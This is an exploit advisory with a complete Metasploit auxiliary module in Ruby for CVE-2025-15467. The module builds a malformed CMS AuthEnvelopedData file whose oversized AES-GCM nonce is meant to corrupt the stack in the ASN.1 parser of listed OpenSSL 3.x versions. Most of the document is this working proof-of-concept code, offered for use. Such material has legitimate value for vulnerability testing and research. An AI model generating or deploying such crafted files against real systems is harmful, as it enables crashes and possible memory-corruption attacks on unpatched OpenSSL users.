📄 OpenSSL 3.x ASN.1 AES‑GCM Nonce Stack Corruption

=============================================================================================================================================
    | # Title     : OpenSSL 3.x ASN.1 AES‑GCM Nonce Stack Corruption via CMS AuthEnvelopedData                                                  |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.openssl-library.org/                                                                                            |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/214422/ & CVE‑2025‑15467
    
    [+] Summary    :  This Metasploit auxiliary module generates a specially crafted CMS file encoded in DER format to test a stack-based buffer overflow vulnerability in OpenSSL’s ASN.1 
                      parser related to improper handling of oversized AES-GCM nonce (IV) values within AES-GCM-Parameters as defined in RFC 5084. 
                      The malformed structure is embedded inside a valid-looking AuthEnvelopedData CMS container (RFC 5083), 
    				  allowing the file to pass basic structural validation while triggering memory corruption during decoding.
                      The issue affects multiple OpenSSL 3.x branches, including versions 3.0.x prior to 3.0.19, 3.3.x prior to 3.3.6, 
    				  3.4.x prior to 3.4.4, 3.5.x prior to 3.5.5, and 3.6.0 prior to 3.6.1, when parsing untrusted CMS data. 
    				  Successful triggering may result in stack corruption and application crash, with potential security impact depending on the execution context.
    
    [+] POC :
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Auxiliary
      include Msf::Exploit::FILEFORMAT
    
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'OpenSSL ASN.1 Parser Stack Corruption Test Generator (CVE-2025-15467)',
          'Description'    => %q{
            This module generates a CMS file in DER format that simulates an AuthEnvelopedData 
            structure according to RFC 5084. It is designed to test for a stack-based buffer 
            overflow vulnerability during the ASN.1 decoding process, specifically when 
            handling oversized Nonce (IV) lengths within the AES-GCM-Parameters structure.
          },
          'Author'         => [ 'indoushka' ],
          'License'        => MSF_LICENSE,
          'References'     => [
            ['CVE', '2025-15467'],
            ['RFC', '5084'],
            ['RFC', '5083']
          ],
          'Notes'          => {
            'Stability'   => [CRASH_SERVICE_DOWN],
            'Reliability' => [LOW_RELIABILITY]
          }
        ))
    
        register_options([
          OptString.new('FILENAME', [ true, 'The output file name.', 'openssl_test.cms']),
          OptInt.new('IV_SIZE', [ true, 'The size of the malicious Nonce to trigger stack overwrite.', 2048])
        ])
      end
      def der_encode(tag, data)
        len = data.length
        if len < 128
          tag + [len].pack('C') + data
        else
          len_str = [len].pack('N').sub(/^(\x00)+/, '')
          tag + [0x80 | len_str.length].pack('C') + len_str + data
        end
      end
    
      def build_cms_structure
        iv_len = datastore['IV_SIZE']
        nonce = der_encode("\x04", "A" * iv_len)
        gcm_params = der_encode("\x30", nonce)
        aes_gcm_oid = "\x06\x09\x60\x86\x48\x01\x65\x03\x04\x01\x2E"
        algo_id = der_encode("\x30", aes_gcm_oid + gcm_params)
        content_type_data = "\x06\x09\x2A\x86\x48\x86\xF7\x0D\x01\x07\x01"
        encrypted_content_info = der_encode("\x30", content_type_data + algo_id)
        auth_env_body = 
          "\x02\x01\x00" +           
          "\x31\x00" +              
          encrypted_content_info +   
          "\x04\x10" + ("B" * 16)    
        auth_env_oid = "\x06\x0B\x2A\x86\x48\x86\xF7\x0D\x01\x09\x10\x01\x17"
        explicit_content = der_encode("\xA0", auth_env_body)
        der_encode("\x30", auth_env_oid + explicit_content)
      end
    
      def run
        file_content = build_cms_structure
        file_create(file_content)
        print_good("Artifact created successfully for Stack Overwrite testing.")
        print_status("RFC 5084 compliant GCM parameters used with IV size: #{datastore['IV_SIZE']}")
      end
    end
    
    Greetings to :============================================================
    jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
    ==========================================================================